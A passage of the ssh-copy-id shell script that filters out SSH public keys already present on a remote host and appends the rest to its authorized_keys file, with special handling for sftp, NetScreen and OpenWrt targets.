$GET_ID)" ] && [ -r "${PUB_ID_FILE:=$DEFAULT_PUB_ID_FILE}" ] ; then use_id_file "$PUB_ID_FILE" fi printf '%s: INFO: Source of key(s) to be installed: %s\n' "$0" "${GET_ID#cat }" >&2 # shellcheck disable=SC2086 if [ -z "$(eval $GET_ID)" ] ; then printf '%s: ERROR: No identities found\n' "$0" >&2 exit 1 fi # assert_scratch_ok() # ensures that $SCRATCH_DIR is setup. assert_scratch_ok() { [ "$SCRATCH_DIR" ] && [ -d "$SCRATCH_DIR" ] && [ -w "$SCRATCH_DIR" ] && return 0 printf 'ERROR: Assertion failure: in %s(): scratch_dir was not correctly set up (SCRATCH_DIR = "%s")\n' "$1" "$SCRATCH_DIR" >&2 return 1 } # filter_ids() # tries to log in using the keys piped to it, and filters out any that work filter_ids() { L_SUCCESS="$1" assert_scratch_ok filter_ids || return L_TMP_ID_FILE="$SCRATCH_DIR"/popids_tmp_id L_OUTPUT_FILE="$SCRATCH_DIR"/popids_output # repopulate "$@" inside this function eval set -- "$SSH_OPTS" while read -r ID || [ "$ID" ] ; do printf '%s\n' "$ID" > "$L_TMP_ID_FILE" # the next line assumes $PRIV_ID_FILE only set if using a single id file - this # assumption will break if we implement the possibility of multiple -i options. # The point being that if file based, ssh needs the private key, which it cannot # find if only given the contents of the .pub file in an unrelated tmpfile $SSH -i "${PRIV_ID_FILE:-$L_TMP_ID_FILE}" \ -o ControlPath=none \ -o LogLevel=INFO \ -o PreferredAuthentications=publickey \ -o IdentitiesOnly=yes "$@" exit >"$L_OUTPUT_FILE" 2>&1 </dev/null if [ "$?" = "$L_SUCCESS" ] || { [ "$SFTP" ] && grep 'allows sftp connections only' "$L_OUTPUT_FILE" >/dev/null # this error counts as a success if we're setting up an sftp connection } then : > "$L_TMP_ID_FILE" else grep 'Permission denied' "$L_OUTPUT_FILE" >/dev/null || { sed -e 's/^/ERROR: /' <"$L_OUTPUT_FILE" >"$L_TMP_ID_FILE" cat >/dev/null #consume the other keys, causing loop to end } fi cat "$L_TMP_ID_FILE" done } # populate_new_ids() uses several global variables ($USER_HOST, $SSH_OPTS ...) # and has the side effect of setting $NEW_IDS populate_new_ids() { if [ "$FORCED" ] ; then # shellcheck disable=SC2086 NEW_IDS=$(eval $GET_ID) return fi printf '%s: INFO: attempting to log in with the new key(s), to filter out any that are already installed\n' "$0" >&2 # shellcheck disable=SC2086 NEW_IDS=$(eval $GET_ID | filter_ids $1) if expr "$NEW_IDS" : "^ERROR: " >/dev/null ; then printf '\n%s: %s\n\n' "$0" "$NEW_IDS" >&2 exit 1 fi if [ -z "$NEW_IDS" ] ; then printf '\n%s: WARNING: All keys were skipped because they already exist on the remote system.\n' "$0" >&2 printf '\t\t(if you think this is a mistake, you may want to use -f option)\n\n' >&2 exit 0 fi printf '%s: INFO: %d key(s) remain to be installed -- if you are prompted now it is to install the new keys\n' "$0" "$(printf '%s\n' "$NEW_IDS" | wc -l)" >&2 } # installkey_sh [target_path] # produce a one-liner to add the keys to remote $TARGET_PATH installkeys_sh() { # In setting INSTALLKEYS_SH: # the tr puts it all on one line (to placate tcsh) # (hence the excessive use of semi-colons (;) ) # then in the command: # cd to be at $HOME, just in case; # the -z `tail ...` checks for a trailing newline. The echo adds one if was missing # the cat adds the keys we're getting via STDIN # and if available restorecon is used to restore the SELinux context # OpenWrt has a special case for root only. INSTALLKEYS_SH=$(tr '\t\n' ' ' <<-EOF $SET_X cd; umask 077; AUTH_KEY_FILE="${TARGET_PATH}"; [ -f /etc/openwrt_release ] && [ "\$LOGNAME" = "root" ] && AUTH_KEY_FILE=/etc/dropbear/authorized_keys; AUTH_KEY_DIR=\`dirname "\${AUTH_KEY_FILE}"\`; mkdir -p "\${AUTH_KEY_DIR}" && { [ -z "\`tail -1c "\${AUTH_KEY_FILE}" 2>/dev/null\`" ] || echo >> "\${AUTH_KEY_FILE}" || exit 1; } && cat >> "\${AUTH_KEY_FILE}" || exit 1; if type restorecon >/dev/null 2>&1; then restorecon -F "\${AUTH_KEY_DIR}" "\${AUTH_KEY_FILE}"; fi EOF ) # to defend against quirky remote shells: use 'exec sh -c' to get POSIX; printf "exec sh -c '%s'" "${INSTALLKEYS_SH}" } #shellcheck disable=SC2120 # the 'eval set' confuses this installkeys_via_sftp() { AUTH_KEY_FILE=${TARGET_PATH} AUTH_KEY_DIR=$(dirname "${AUTH_KEY_FILE}") # repopulate "$@" inside this function eval set -- "$SSH_OPTS" assert_scratch_ok installkeys_via_sftp || return 1 L_KEYS="$SCRATCH_DIR"/authorized_keys L_SHARED_CON="$SCRATCH_DIR"/master-conn $SSH -f -N -M -S "$L_SHARED_CON" "$@" L_CLEANUP="$SSH -S '$L_SHARED_CON' -O exit 'ignored' >/dev/null 2>&1 ; $SCRATCH_CLEANUP" #shellcheck disable=SC2064 trap "$L_CLEANUP" EXIT TERM INT QUIT sftp -b - -o "ControlPath='$L_SHARED_CON'" "ignored" <<-EOF || return 1 -get "$AUTH_KEY_FILE" "$L_KEYS" EOF # add a newline or create file if it's missing, same like above [ -z "$(tail -1c "$L_KEYS" 2>/dev/null)" ] || echo >> "$L_KEYS" # append the keys being piped in here cat >> "$L_KEYS" sftp -b - -o "ControlPath='$L_SHARED_CON'" "ignored" <<-EOF || return 1 -mkdir "$AUTH_KEY_DIR" chmod 700 "$AUTH_KEY_DIR" put "$L_KEYS" "$AUTH_KEY_FILE" chmod 600 "$AUTH_KEY_FILE" EOF #shellcheck disable=SC2064 eval "$L_CLEANUP" && trap "$SCRATCH_CLEANUP" EXIT TERM INT QUIT } # create a scratch dir for any temporary files needed if SCRATCH_DIR=$(mktemp -d ~/.ssh/ssh-copy-id.XXXXXXXXXX) && [ "$SCRATCH_DIR" ] && [ -d "$SCRATCH_DIR" ] then chmod 0700 "$SCRATCH_DIR" SCRATCH_CLEANUP="rm -rf \"$SCRATCH_DIR\"" #shellcheck disable=SC2064 trap "$SCRATCH_CLEANUP" EXIT TERM INT QUIT else printf '%s: ERROR: failed to create required temporary directory under ~/.ssh (HOME="%s")\n' "$0" "$HOME" >&2 exit 1 fi REMOTE_VERSION=$($SSH -v -o PreferredAuthentications=',' -o ControlPath=none "$@" 2>&1 | sed -ne 's/.*remote software version //p') # shellcheck disable=SC2029 case "$REMOTE_VERSION" in NetScreen*) populate_new_ids 1 for KEY in $(printf "%s" "$NEW_IDS" | cut -d' ' -f2) ; do KEY_NO=$((KEY_NO + 1)) printf '%s\n' "$KEY" | grep ssh-dss >/dev/null || { printf '%s: WARNING: Non-dsa key (#%d) skipped (NetScreen only supports DSA keys)\n' "$0" "$KEY_NO" >&2 continue } [ "$DRY_RUN" ] || printf 'set ssh pka-dsa key %s\nsave\nexit\n' "$KEY" | $SSH -T "$@" >/dev/null 2>&1 if [ $? = 255 ] ; then printf '%s: ERROR: installation of key #%d failed (please report a bug describing what caused this, so that we can make this message useful)\n' "$0" "$KEY_NO" >&2 else ADDED=$((ADDED + 1)) fi done if [ -z "$ADDED" ] ; then exit 1 fi ;; *) # Assuming that the remote host treats $TARGET_PATH as one might expect populate_new_ids 0 if ! [ "$DRY_RUN" ] ; then printf '%s\n' "$NEW_IDS" | \ if [ "$SFTP" ] ; then #shellcheck disable=SC2119 installkeys_via_sftp else $SSH "$@" "$(installkeys_sh)" fi || exit 1 fi ADDED=$(printf '%s\n' "$NEW_IDS" | wc -l) ;; esac if [ "$DRY_RUN" ] ; then cat <<-EOF =-=-=-=-=-=-=-= Would have added the following key(s): $NEW_IDS =-=-=-=-=-=-=-= EOF else [ -z "$SFTP" ] || PORT_OPT=P cat <<-EOF Number of key(s) added: $ADDED Now try logging into the machine, with: "${SFTP:-ssh} ${SEEN_OPT_I:+-i${PRIV_ID_FILE:+ $PRIV_ID_FILE} }${SSH_PORT:+-${PORT_OPT:-p} $SSH_PORT }${OPTS_USER_HOST}" and check to make sure that only the key(s) you wanted were added. EOF fi # =-=-=-=
Close